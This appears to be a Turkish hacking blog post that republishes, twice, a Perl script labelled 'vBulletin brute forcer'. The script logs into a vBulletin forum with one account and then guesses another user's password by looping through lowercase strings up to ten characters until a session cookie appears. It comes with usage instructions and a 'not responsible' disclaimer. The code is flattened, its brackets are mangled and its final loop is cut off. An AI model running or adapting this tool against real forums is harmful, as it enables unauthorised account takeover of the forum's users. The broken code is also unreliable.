Priv8 | Local Root Exploit # HeRoTurk

[php]#!/usr/bin/perl use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; use Time::HiRes qw(gettimeofday); $host = $ARGV***91;0***93;; $usern = $ARGV***91;1***93;; $passw = $ARGV***91;2***93;; $uname = $ARGV***91;3***93;; $url = "http://".$host; $alpha = "abcdefghijklmnopqrstuvwxyz"; #charset $charcount = 24; #number of chars in $alpha $dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds. $count = 0; $logins = 0; $minchars = 1; #min chars $maxchars = 10; #max chars print q( ########################################################### # vBulletin brute forcer # # http://www.unnamedone.com # # brian_denys@hotmail.com # # 09 - April - 2008 # ################## Coded By UnnamedOne #################### ); if (@ARGV < 4) { print " # I am not responsible for anything that you do with this!\n"; print " # This has been tested on vBulletin 3.6.8 and 3.7.0!\n"; print " # usage : vbrute.pl ***91;host & path***93; ***91;user***93; ***91;pass***93; ***91;target***93;\n"; print " # E.g : vbrute.pl www.milw0rm.com/vBulletin3.6.8/ UnnamedOne MyPass str0ke\n"; exit(); } fakelogin(); for(my $t=$minchars;$t<=$maxchars;$t++) { crack($t); } sub fakelogin { $xplr = LWP::UserAgent->new() or die; $cookie_jarr = HTTP::Cookies->new(); $xplr->cookie_jar( $cookie_jarr ); $resr = $xplr->post($url.'login.php?do=login', Content => ***91; "vb_login_username" => "$usern", "vb_login_password" => "$passw", "do" => "login", ***93;,); if($cookie_jarr->as_string =~ /IDstack=(.*?);/) { #Do nothing.. } else { #print $cookie_jarr->as_string; print "Forum not vulnerable or wrong username / password.\n"; exit(); } } sub crack { $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); $CharSet = shift; @RawString = (); for (my $i =0;$i<$CharSet;$i++) { $RawString***91;i***93; = 0; } $Start = gettimeofday(); do { for (my $i =0;$i<$CharSet;$i++) { if ($RawString***91;$i***93; > length($alpha)-1) { if ($i==$CharSet-1) { $cnt = 0; return false; } $RawString***91;$i+1***93;++; $RawString***91;$i***93;=0; } } $ret = ""; for (my $i =0;$i<$CharSet;$i++) { $ret = $ret . substr($alpha,$RawString***91;$i***93;,1); } $count++; if($count == 4) { fakelogin(); $count = 0; } $xpl->cookie_jar( $cookie_jar ); $res = $xpl->post($url.'login.php?do=login', Content => ***91; "vb_login_username" => "$uname", "vb_login_password" => "$ret", "do" => "login", ***93;,); $cnt++; $Stop = gettimeofday(); if ($Stop-$Start>$dbgtmr) { $cnt = int($cnt/$dbgtmr); $Start = gettimeofday(); } $logins++; system("clear"); $pro = ($logins / ($charcount * $maxchars)); print "Current password: $ret\n"; print "Login attempts: $logins\n"; print "Cracking speed: $cnt passwords/sec\n"; print "$pro% finished.\n"; $cnt = 0; if($cookie_jar->as_string =~ /IDstack=(.*?);/) { print "Password cracked! => $ret\n"; exit(); } $RawString***91;0***93;++; }while($RawString***91;$CharSet-1***93;

[php]#!/usr/bin/perl use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; use Time::HiRes qw(gettimeofday); $host = $ARGV***91;0***93;; $usern = $ARGV***91;1***93;; $passw = $ARGV***91;2***93;; $uname = $ARGV***91;3***93;; $url = "http://".$host; $alpha = "abcdefghijklmnopqrstuvwxyz"; #charset $charcount = 24; #number of chars in $alpha $dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds. $count = 0; $logins = 0; $minchars = 1; #min chars $maxchars = 10; #max chars print q( ########################################################### # vBulletin brute forcer # # http://www.unnamedone.com # # brian_denys@hotmail.com # # 09 - April - 2008 # ################## Coded By UnnamedOne #################### ); if (@ARGV < 4) { print " # I am not responsible for anything that you do with this!\n"; print " # This has been tested on vBulletin 3.6.8 and 3.7.0!\n"; print " # usage : vbrute.pl ***91;host & path***93; ***91;user***93; ***91;pass***93; ***91;target***93;\n"; print " # E.g : vbrute.pl www.milw0rm.com/vBulletin3.6.8/ UnnamedOne MyPass str0ke\n"; exit(); } fakelogin(); for(my $t=$minchars;$t<=$maxchars;$t++) { crack($t); } sub fakelogin { $xplr = LWP::UserAgent->new() or die; $cookie_jarr = HTTP::Cookies->new(); $xplr->cookie_jar( $cookie_jarr ); $resr = $xplr->post($url.'login.php?do=login', Content => ***91; "vb_login_username" => "$usern", "vb_login_password" => "$passw", "do" => "login", ***93;,); if($cookie_jarr->as_string =~ /IDstack=(.*?);/) { #Do nothing.. } else { #print $cookie_jarr->as_string; print "Forum not vulnerable or wrong username / password.\n"; exit(); } } sub crack { $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); $CharSet = shift; @RawString = (); for (my $i =0;$i<$CharSet;$i++) { $RawString***91;i***93; = 0; } $Start = gettimeofday(); do { for (my $i =0;$i<$CharSet;$i++) { if ($RawString***91;$i***93; > length($alpha)-1) { if ($i==$CharSet-1) { $cnt = 0; return false; } $RawString***91;$i+1***93;++; $RawString***91;$i***93;=0; } } $ret = ""; for (my $i =0;$i<$CharSet;$i++) { $ret = $ret . substr($alpha,$RawString***91;$i***93;,1); } $count++; if($count == 4) { fakelogin(); $count = 0; } $xpl->cookie_jar( $cookie_jar ); $res = $xpl->post($url.'login.php?do=login', Content => ***91; "vb_login_username" => "$uname", "vb_login_password" => "$ret", "do" => "login", ***93;,); $cnt++; $Stop = gettimeofday(); if ($Stop-$Start>$dbgtmr) { $cnt = int($cnt/$dbgtmr); $Start = gettimeofday(); } $logins++; system("clear"); $pro = ($logins / ($charcount * $maxchars)); print "Current password: $ret\n"; print "Login attempts: $logins\n"; print "Cracking speed: $cnt passwords/sec\n"; print "$pro% finished.\n"; $cnt = 0; if($cookie_jar->as_string =~ /IDstack=(.*?);/) { print "Password cracked! => $ret\n"; exit(); } $RawString***91;0***93;++; }while($RawString***91;$CharSet-1***93;

Priv8 | Local Root Exploit # HeRoTurk

25 Ocak 2018 Perşembe

vBulletin brute forcer

Hiç yorum yok:

Yorum Gönder

vBulletin brute forcer

Hiç yorum yok:

Yorum Gönder

Popüler

Popular Posts